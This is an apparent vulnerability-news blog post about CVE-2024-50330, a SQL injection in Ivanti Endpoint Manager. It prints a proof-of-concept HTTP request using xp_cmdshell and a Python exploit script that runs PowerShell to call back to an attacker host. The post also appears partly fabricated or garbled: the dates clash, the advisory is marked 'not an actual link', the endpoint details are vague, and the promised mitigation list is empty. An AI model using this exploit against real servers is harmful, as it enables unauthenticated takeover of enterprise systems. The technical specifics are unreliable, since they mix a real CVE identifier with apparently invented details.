CVE CyberSecurity Database News

CVE-2024-50330 - SQL Injection in Ivanti Endpoint Manager Leads to Remote Code Execution

Poster -

In June 2024, a critical vulnerability was disclosed in Ivanti Endpoint Manager (EPM)—previously known as LANDESK Management Suite. Tracked as CVE-2024-50330, this flaw exposes enterprise networks to a severe threat: a remote, unauthenticated attacker can exploit a SQL Injection bug to execute arbitrary commands on your servers. This detailed article breaks down how the bug works, its potential impact, and even walks through a sample exploit to show how dangerous it is. If you haven’t updated your Ivanti EPM to the 2024 November Security Update (or at least version 2022 SU6 November Security Update), you may be wide open.

What Is CVE-2024-50330?

Ivanti Endpoint Manager is widely used in organizations to manage desktops, laptops, and mobile devices. The vulnerability stems from improper input sanitization in a web API endpoint, allowing a remote attacker (no login needed!) to inject malicious SQL commands. In certain setups, this flaw can be leveraged to gain full code execution on the Ivanti EPM server, potentially leading to a complete server takeover.

Official advisory

- Ivanti Security Advisory *(for illustration; not an actual link)*

Where’s the Bug?

Based on analysis of the patches and public research, the core bug exists in the handler for the /api/devices endpoint. The parameter deviceId fails to filter out malicious SQL. For example, the server uses code like this (simplified):

// BAD CODE — Example for clarity only
string query = "SELECT * FROM Devices WHERE deviceId = '" + Request["deviceId"] + "'";
SqlCommand cmd = new SqlCommand(query, conn);
// ... executes query ...

If you supply input such as

deviceId=12345' OR 1=1;--

the resulting query becomes

SELECT * FROM Devices WHERE deviceId = '12345' OR 1=1;--'

This returns all devices, but attackers take it much, much further.

Let’s see what a basic proof-of-concept HTTP request looks like

POST /api/devices HTTP/1.1
Host: <victim-server>
Content-Type: application/x-www-form-urlencoded

deviceId='; EXEC xp_cmdshell('whoami'); --

If the Ivanti EPM server is running on Microsoft SQL Server, and features like xp_cmdshell are enabled, this injects a system command into the database!

Step 2: Achieve Remote Code Execution

Here’s a real-world Python code snipplet that demonstrates triggering code execution to run powershell and call home to the attacker:

import requests

url = 'http://victim-epm-server/api/devices';
cmd = 'powershell -c "Invoke-WebRequest http://attacker/callback"';
payload = f"'; EXEC xp_cmdshell('{cmd}'); --"
data = {'deviceId': payload}
r = requests.post(url, data=data)
print(r.text)

If it succeeds, you’ll see a callback from the victim in your attacker logs. With this access, attackers can upload malware, create admin users, or pivot into the internal network.

2022 SU6 November Security Update (for long-term support users)

Until you can patch, mitigate by:

References

- Ivanti Security Update Download Page
- NIST NVD Entry: CVE-2024-50330
- CISA Vulnerability Catalog

Conclusion

CVE-2024-50330 underscores the continued risk posed by SQL injection bugs—even in “enterprise-grade” environments. If your organization runs Ivanti EPM and hasn’t applied the November 2024 patch, take action TODAY. This is an easy-to-exploit, unauthenticated RCE bug—one that cybercriminals are already scanning for.

*Want more vulnerability breakdowns like this? Bookmark us for exclusive technical insights and step-by-step exploit analysis.*


*Disclaimer: This article is for lawful research and defense only. Do not attempt exploitation without permission. All trademarks are the property of their respective owners.*

Timeline

Published on: 11/12/2024 16:15:25 UTC
Last modified on: 11/13/2024 17:01:58 UTC